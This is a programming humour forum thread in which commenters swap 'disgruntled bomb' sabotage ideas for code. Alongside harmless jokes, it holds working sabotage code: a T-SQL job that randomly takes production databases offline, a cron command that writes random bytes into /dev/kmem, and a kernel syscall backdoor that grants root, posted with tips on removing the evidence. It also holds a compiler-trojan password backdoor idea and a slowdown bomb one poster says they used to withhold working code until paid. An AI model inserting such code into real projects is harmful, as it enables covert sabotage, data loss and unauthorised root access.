• lax (unregistered)


    static SomeCtor()
      typeof(string).GetField("Empty").SetValue(null, " ");
    //Sets string.Empty to a space character

    __ Note from Alex: I just tested, and this actually works!

  • Franky (unregistered)

    going back to the "#define double int": If it is a software that does some numeric hocus pocus it would be even more evil to "#define double float" as it more subtly changes the calculations/results but will still destroy your precision.

  • c2Ft (unregistered) in reply to C-Octothorpe
    I've been doing this software development thing for years now, and I still giggle a little when I read "private members"... Is that just me?


  • (cs) in reply to Sten
    Does not work. Private members are accessible only by the class itself.

    Friends can access their private members.

  • (cs)

    I actually added a bomb in some code I sent to a previous employer (in a different country), but I told them I had inserted the bomb, and would forward the source, without bomb, once payment cleared. This could be re-purposed.

    My original code (actually in assembler, but this is in C):

    int Delay = 0;
    void VitalFunctionInCode()
        if(Delay < INT_MAX) Delay++;
        int i;
        for(int i=0; i<Delay; i++) { SmallDelay(); }
        /* Original Code */

    The result of this code was that over a period of 15-30 minutes, the code got slower and slower, eventually being unusable. It allowed the customer to verify the original bug was fixed, but not to actually ship it until they got the final version I sent after I was paid.

    This could easily be updated and inserted in a release-mode only way, and with a slower acting effect.

  • trwtf (unregistered) in reply to C-Octothorpe
    sheep hurr durr:
    Turning all privates public doesn't actually do much. It just prevents compiler errors... and as languages like Python and Pike have proved, it's perfectly possible to eliminate the entire concept of private members. Also, the #define won't change the compiler default; if you declare a class, members are private until you put a label. By convention at my workplace, all classes have private data, then private member functions, then the "public:" label, then constructors, then interface. Your #define would sadly have no effect :(

    #define class struct

    (Although, I'm curious; how do you unit test your private member functions if there's no way to get at them from outside the class?)

    I've been doing this software development thing for years now, and I still giggle a little when I read "private members"... Is that just me?

    Yep, that's pretty standard for most school kids.

    Me too. Looks like I have another twin on here.

    "You said private... huh huh huh huh".

    See what I mean?

  • MrOli (unregistered) in reply to Wim


    How much code do you write which is completely deterministic? - ie, has no interaction with anything else and therefore follows an identical code path from start to finish, triggering this bomb on the same line every time?

  • bob42 (unregistered)

    although i would never put this in production, this would be something great to leave on a dev sql server as a "Ha ha! i got the last laugh!". The way to use this would be to create a sql server agent job and put the code in the job, and have the job execute something like once a day, week, month, etc.

    Essentially what the code does is it randomly selects a non-system database, and generates a random number for the database and a random number to compare two. if both numbers match it sets the database to offline. so, the result of this is that every so often, at a non-specific interval, a random database will go offline.

    declare @databases table (name varchar(128), Sm int) declare @database table (name varchar(128), Sm int) declare @number int, @name varchar(128), @sql varchar(max)

    insert into @databases (name, Sm) select name, abs(checksum(newid()))% (select count(*) from sys.databases where database_id>4 and state=0) from sys.databases where database_id>4 and state=0

    select @number=abs(checksum(newid()))% (select count(*) from sys.databases)

    insert into @database (name, Sm) select top 1 name, sm from @databases order by sm

    if exists (select top 1 name from @database) begin

    select @name=name from @database where sm=@number
    set @sql='alter database [' + @name + '] set offline with rollback after 30 seconds'


  • C-Octothorpe (unregistered) in reply to trwtf
    sheep hurr durr:
    Turning all privates public doesn't actually do much. It just prevents compiler errors... and as languages like Python and Pike have proved, it's perfectly possible to eliminate the entire concept of private members. Also, the #define won't change the compiler default; if you declare a class, members are private until you put a label. By convention at my workplace, all classes have private data, then private member functions, then the "public:" label, then constructors, then interface. Your #define would sadly have no effect :(

    #define class struct

    (Although, I'm curious; how do you unit test your private member functions if there's no way to get at them from outside the class?)

    I've been doing this software development thing for years now, and I still giggle a little when I read "private members"... Is that just me?

    Yep, that's pretty standard for most school kids.

    Me too. Looks like I have another twin on here.

    "You said private... huh huh huh huh".

    See what I mean?

    I think TRWTF is trwtf... You're on a forum with 99.99% men (and I use that term VERY loosley), about technology, on a site called The Daily What The F*ck. Sorry, but what do you expect? If you want mature talk, maybe you should go back to 4chan or reddit... :)

  • Husted (unregistered)

    Hmm... how about this:

    #define struct union

  • revenant (unregistered)

    Are you sure you want to delete file?

    int WINAPI MessageBoxEvil(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType)
        int result=MessageBox(hWnd,lpText,lpCaption,uType);
        if (rand()%100)
    #define MessageBox MessageBoxEvil
  • Wim (unregistered) in reply to MrOli


    Well the definition of Deterministic that I use says that, given the same input, the program always behaves exactly the same. So my answer would be, most.

  • Nick (unregistered)

    Change the Gnu compiler such that a call to a subroutine called "checkpassword", returns true if the user is "xyyzz".

    Pick the subroutine from your knowledge of internal code.

    Now recompile the compiler. Release it. Restore the compiler code to the real source code.

    Unless someone checks the checksum of the compiler executable you have a back door into the system.

  • Heh (unregistered)
    typedef void *(*malloc_hook_t)(size_t, const void *)
    #ifndef _DEBUG
    malloc_hook_t old_malloc_hook = __malloc_hook;
    __malloc_hook = _new_malloc;
    void *
    _new_malloc(size_t size, const void *return_addr) {
        if (rand() % 0)
            usleep(size * 100);
        __malloc_hook = old_malloc_hook;
        void *m = malloc(size);
        __malloc_hook = _new_malloc;
        return m;
    #ifndef _DEBUG
    #ifdef __cplusplus
    void *
    operator new(size_t size) {
        return _new_malloc(size, __builtin_return_address(0));
  • (cs)

    Okay, this is a C++ idea.

    1. Override assignment.
    2. Assignment launches a background thread that...
    3. Sleeps and then re-assigns the pre-assignment value. Presumably, that would be the default value.
  • (cs)

    #define const #define volatile #define public #define protected #define private #define class struct

    Assuming that works (way too lazy to check), it's a recipe for subtle bugs everywhere. Double points if you can modify the makefiles to look like they're using -Wall -Werror without actually using them.

  • Jon (unregistered)

    My code is nothing but inadvertent bombs due to lack of skill. Disgruntlement is not a precondition.

  • haha-only-serious (unregistered)

    I once contemplated adding this line of code into the big ball of PHP-mud that is the in-house CMS of my former employer:

    if (mt_rand(0,10000) > 9000) { header('HTTP/1.0 503 Service Temporarily Unavailable', 503); exit; }

  • (cs)

    In QuakeC:

    void(void) worldspawn = {
      // the stuff that was there before
      // ...
      // THE BOMB:
      float x = 0;
      // ...
      x = 42;

    Reason is that in QuakeC, "type x = ..." declares a constant, not a variable. Old compilers don't even warn on that. Assigning the value 42 to it will overwrite the 0 constant - and as all compilers do constant merging to use the same memory location for all constants of the same value, this suddenly changes the value of 42 (even literal 42)!

    Luckily, no enterprise apps are written in QuakeC.

    Other ideas for hard to find, and easily deniable, "disgruntled bombs":

    an outdated hostname entry in /etc/hosts

    writing to pointer function arguments (NOTE: test that the bomb doesn't cause obvious breakage)

    typedef float vec3_t[3];
    void DoSomethingAt(vec3_t someposition) {
      VectorNormalize(someposition); // #4381: vector must be normalized for this to work
      ... do something with someposition ...

    Unfortunately too easy to trace: forgetting to close a file descriptor

    And my favorite: find existing code of the sort

    SomeType foo[1000];
    memcpy(foo, someinput, 1000 * sizeof(*foo));
    for(i = 0; i <= 999; ++i) dosomethingwith(foo[i]);

    Then, decide to turn the number into a macro. "forget" one of the occurrences! Works best if, like in this case, the original code also used n-1 as magic number, as that gives a well deniable reason to miss it when macroifying.

    #define MAX_FOOS 1000
    SomeType foo[MAX_FOOS];
    memcpy(foo, someinput, MAX_FOOS * sizeof(*foo));
    for(i = 0; i <= 999; ++i) dosomethingwith(foo[i]);

    Then, wait for some time, then change MAX_FOOS and disappear.

    The worst part is: I have seen all this "bombs" in code already.

  • Bobbo (unregistered)

    Surely a bomb which was disgruntled wouldn't explode at all?

  • (cs) in reply to Sten
    Note that this code won't show anything suspicious even when running the program in strace, since it calls gettimeofday only from time to time. Better version can be achieved after rewriting to assembly, since not even gdb would show anything helpful.

    It is guilty of infinite recursion, because the malloc() calls in __builtin_malloc() get replaced with calls to __builtin_malloc()...

  • Sten (unregistered) in reply to Steve The Cynic

    Yes, I noted that in a reply to that post and suggested the #define should be placed at the bottom.

  • (cs) in reply to Sten
    It will also make the library mysteriously fail to interoperate with other versions that were compiled without the redefinition. In a big app, this would be a nightmare.

    That’s not true.

    #define private public
    does not change ABI in any way since the classes do not change memory layout. I use it from time to time since some library developers are morons that define everything private and have never experienced any problem with that.
    Don't ever write code that runs on a DeathStation 9000, then. If two definitions of a class do not (after the preprocessor has had its malignant way with the code) have exactly the same sequence of tokens, the results are "undefined behaviour". Added to which, on some compilers, name mangling includes information about the private/public status of functions, which will result in whimsical link failures.

  • trwtf (unregistered) in reply to C-Octothorpe
    You're on a forum with 99.99% men
    Ironic you should say that because my point was that you reek of a recent school leaver. Your apparent maturity level ("private members", har har) only supports this hypothesis. Yet your comeback is "you're on a forum with 99.99% men"? I think not. I'm on a forum with about 25% men, 5% women and 70% school kids / interns / college leavers. What was your point again?
  • anon (unregistered) in reply to bob42
    although i would never put this in production, this would be something great to leave on a dev sql server as a "Ha ha! i got the last laugh!". The way to use this would be to create a sql server agent job and put the code in the job, and have the job execute something like once a day, week, month, etc.

    Essentially what the code does is it randomly selects a non-system database, and generates a random number for the database and a random number to compare two. if both numbers match it sets the database to offline. so, the result of this is that every so often, at a non-specific interval, a random database will go offline.

    declare @databases table (name varchar(128), Sm int) declare @database table (name varchar(128), Sm int) declare @number int, @name varchar(128), @sql varchar(max)

    insert into @databases (name, Sm) select name, abs(checksum(newid()))% (select count(*) from sys.databases where database_id>4 and state=0) from sys.databases where database_id>4 and state=0

    select @number=abs(checksum(newid()))% (select count(*) from sys.databases)

    insert into @database (name, Sm) select top 1 name, sm from @databases order by sm

    if exists (select top 1 name from @database) begin

    select @name=name from @database where sm=@number
    set @sql='alter database [' + @name + '] set offline with rollback after 30 seconds'


    Yea, that's just brilliant. OK, a DB went offline at exactly 10:15:32 last night, where should I look to see what happened? Maybe the database logs. Oh, a random maintenance plan I've never heard of was scheduled for that exact time. Well, that has to be a coincidence, so I guess I will not look and see very clearly what that plan does, and thus this "bomb" will definitely go off many times for maximum lulz.

  • Childish (unregistered) in reply to Neil
    The WTF about the sample is that you should not be using NULL in C++ code, you should just write 0.
    Note that you can only use 0 as a varadic null pointer argument in 32-bit code. 0LL works in 64-bit code, but not in 32-bit code. 0L works everywhere except Win64.

    Congradulations! You just invented another bomb on pointer size.

    #define NULL ((char) 0)

  • (cs) in reply to trwtf
    You're on a forum with 99.99% men
    Ironic you should say that because my point was that you reek of a recent school leaver. Your apparent maturity level ("private members", har har) only supports this hypothesis. Yet your comeback is "you're on a forum with 99.99% men"? I think not. I'm on a forum with about 25% men, 5% women and 70% school kids / interns / college leavers. What was your point again? You need to grow up and stop using mommy and daddy's modem. Yours, Bert Glanstron
  • Gary (unregistered) in reply to Nick
    Change the Gnu compiler such that a call to a subroutine called "checkpassword", returns true if the user is "xyyzz".

    returns Y2 if the user is "xyzzy", otherwise returns plugh


  • adiener (unregistered) in reply to sheep hurr durr
    sheep hurr durr:
    (Although, I'm curious; how do you unit test your private member functions if there's no way to get at them from outside the class?)

    Unit tests are for verifying that your code behaves as advertised in its public API. Private instance variables are implementation details, which makes them irrelevant to unit tests as long as the functionality you're testing does what it's supposed to do.

  • (cs)

    Here's a good one to fuck with your web/CSS devs. Throw it in any .css file.

    body * { display: inline !important; }

    For scoring purposes, every time they reinstall their web browser counts as one point.

    If you'd rather be more subtle, try this one:

     br { float: left; }
  • vitameatahegemon (unregistered) in reply to Sten

    I do not think the preprocessor works the way you think it does.

  • vitameatahegemon (unregistered) in reply to Sten
    Yes, I noted that in a reply to that post and suggested the #define should be placed at the bottom.
    Apparently posting does not work the way I think it does. Oops. Anyway, the preprocessor comment was intended to be in reply to what's quoted here.
  • Sten (unregistered) in reply to vitameatahegemon
    I do not think the preprocessor works the way you think it does.

    It does, defines work from the point they are defined onwards and do not affect anything prior that point. Just checked it.

  • Martijn Lievaart (unregistered) in reply to Neil
    The WTF about the sample is that you should not be using NULL in C++ code, you should just write 0.
    Note that you can only use 0 as a varadic null pointer argument in 32-bit code. 0LL works in 64-bit code, but not in 32-bit code. 0L works everywhere except Win64.

    Either that, or you could use a standards complient compiler instead. (Hint, the standard requires that the number '0' translates to a valid null pointer).

  • anon (unregistered) in reply to Sten
    I do not think the preprocessor works the way you think it does.

    It does, defines work from the point they are defined onwards and do not affect anything prior that point. Just checked it.

    confused puppy head tilt

    Then... mine must be defective.

  • drusi (unregistered) in reply to Sobriquet
    You can also mess with permissions so the install won't work properly for non-admins,
    Shouldn't the "bomb" be something that isn't how companies are already designing their software anyway?
  • kastein (unregistered) in reply to Cipri
    I'd have to go with making a cronjob running
    dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM

    Replace a random bit of kernel memory with a random value.

    somehow I think I have seen this somewhere before...

    I actually added a bomb in some code I sent to a previous employer (in a different country), but I told them I had inserted the bomb, and would forward the source, without bomb, once payment cleared. This could be re-purposed.

    My original code (actually in assembler, but this is in C):

    int Delay = 0;
    void VitalFunctionInCode()
        if(Delay < INT_MAX) Delay++;
        int i;
        for(int i=0; i<Delay; i++) { SmallDelay(); }
        /* Original Code */

    The result of this code was that over a period of 15-30 minutes, the code got slower and slower, eventually being unusable. It allowed the customer to verify the original bug was fixed, but not to actually ship it until they got the final version I sent after I was paid.

    This could easily be updated and inserted in a release-mode only way, and with a slower acting effect.

    Why did you do this? Company well known for not paying up without a fight?

    Hmm... how about this:

    #define struct union

    Evil, but not diabolical. sizeof() will give you away, as will the fact that this breaks everything very quickly. Not subtle enough to survive.

    My favorite evil code so far (done by me, on my own kernel):

    /* for security reasons only root may call this syscall */
    if (current->cred->uid ^= current->cred->uid &&\
        return -EPERM;

    insert into rarely called syscall of choice. Season to taste.

    You now have a backdoor into your own kernel; if someone gets into your system and changes your root pass but you still have a connection open you can make yourself root and kick them back out. Obviously you need to not leave the evidence in your source tree or tell anyone the specific syscall or obscure conditions you chose, I choose different ones for each of my systems and remove the evidence from the kernel source after rebuild.

  • Ori (unregistered) in reply to ÃÆâ€ââ

    If by "wicked" you mean "sociopathic", then yes.

  • Henning Makholm (unregistered) in reply to Martijn Lievaart
    Martijn Lievaart:
    Note that you can only use 0 as a varadic null pointer argument in 32-bit code. 0LL works in 64-bit code, but not in 32-bit code. 0L works everywhere except Win64.
    Either that, or you could use a standards complient compiler instead. (Hint, the standard requires that the number '0' translates to a valid null pointer).
    Yes, if you give the compiler any reason to think you mean a pointer rather than simply the integer 0. Note that this is specifically in context of variadic arguments, and there are machines out there that aren't Vaxen.
  • Matt (unregistered) in reply to Ori

    VBA in an Excel workbook where people expect macros.

    Application.DisplayAlerts = False

  • Sten (unregistered) in reply to anon
    *confused puppy head tilt*

    Then... mine must be defective.

    It seems so. In order to be precise, I looked this up in ISO 9899:1999 and it is so:

    A preprocessing directive of the form
    # define identifier replacement-list new-line
    defines an object-like macro that causes each subsequent instance of the macro name to be replaced by the replacement list of preprocessing tokens that constitute the remainder of the directive.
  • Sten (unregistered) in reply to kastein
    /* for security reasons only root may call this syscall */
    if (current->cred->uid ^= current->cred->uid &&\
        return -EPERM;

    I know better:

    /* for security reasons only root may call this syscall */
    if (some_obscure_condition &&\
            current->cred->uid = 0)
        return do_work();
    return -EPERM;

    And as far as I remember, a similar one even got into vanilla Linux kernel

  • nitori (unregistered) in reply to db2
    Here's a good one to fuck with your web/CSS devs. Throw it in any .css file.
    body * { display: inline !important; }

    For scoring purposes, every time they reinstall their web browser counts as one point.

    If you'd rather be more subtle, try this one:

     br { float: left; }

    A few years ago, that would have been a bastard move. But with a decent, modern web debug tool (the one built into Chrome will do), it is rather easy to catch. If I'm thinking right, every single element on the page would show that it is inheriting that inline from your rule, so I would see it on any random element I pick out of the body. At least thats true for the first one. I don't know if I would think to look at the style info for a lowly br for that second one there.

  • (cs)

    Seeing as I work mostly with WCF, here's my suggestion:

    1. In an important .svc file, subtly insert the attribute to define a custom ServiceHostFactory.
    2. In said ServiceHostFactory, add an innocent-looking ParameterInspector.
    3. In said ParameterInspector, randomly change input and/or output data, but only on rare occasions (it is helpful if you can use data in your web.config to determine whether it is a production environment, which we can).
  • airdrik (unregistered)

    In python, try this:

    class _type(type):
        def __new__(m, n, b, d):
            d['_'] = {}
            def _(mc, c, *args, **kwargs):
                if args not in c._:
                    c._[args] = object.__new__(c)
                return c._[args]
            d['__new__'] = _
            o = super(_type, m).__new__(m, n, b, d)
            return o
    __metaclass__ = _type

    In summary, changes the metaclass for all classes (within the module and wherever module is imported) so that instances of that class are cached based on creation parameters. First and most obvious is that you only think you are getting new instances but in fact you may be getting a previously-instantiated instance (the class's init gets called every time the instance is requested). Second and slightly more subtle is that those instances never get freed so long as the Class is still visible - so if it is a sizable class that gets created frequently.... Alternatively if you only care about the memory leak, just throw them in a list:

        def __new__(m, n, b, d):
            d['_'] = []
            def _(mc, c, *args, **kwargs):
                return c._[-1]

    or you can make everything into a singleton:

        def __new__(m, n, b, d):
            d['_'] = None
            def _(mc, c, *args, **kwargs):
                if c._ is None:
                    c._ = object.__new__(c)
                return c._

    Or you can do more simple maliciousness like deleting or redefining class methods or returning a different class altogether.

    class _type(type):
        def __new__(m, n, b, d):
            a = d.keys()[0]
            del d[a]
            d['important_method'] = lambda *args,**kwargs: 0
            return super(_type, m).__new__(m, n, b[:-1], d)
    __metaclass__ = _type
  • Ol' Bob (unregistered) in reply to Niels
    The WTF about the sample is that you should not be using NULL in C++ code, you should just write 0.

    How much do you want for you first edition of K&R..?

  • ch (unregistered)

    On an Oracle database, do:


  • (cs)
    class foo(object):
        someattribute = 1
        def __str__ (self):
            self.someattribute += 1
            return super(object, self).__str__()

    Stir in randomness for more evil to taste. Bonus points for making this happen only in the middle of a long class hierarchy.

  • Ralph (unregistered)

    Stage 1:

    Make your "application" (it's a program, Jim) spew up dialog boxes every few seconds challenging the user with trivial sphinx-like questions worded as obscurely as possible. Train them by experience that if they want to get anything done they have to keep hammering away on "OK" as if they are playing whack-a-mole.

    Stage 2:

    After some time, when pretty much everyone is under your hypnotic spell, start attacking users with security exploits. When they complain that your product is uber-lame, remind them that you did pop up a warning and it was their choice to click OK.

  • MrOli (unregistered) in reply to Wim

    I see... Well, I wont argue with the dictionary definition you gave, just feel jealous that the environment within which you write code is completely predictable all the time...no users, no dependencies, no threads, no events.

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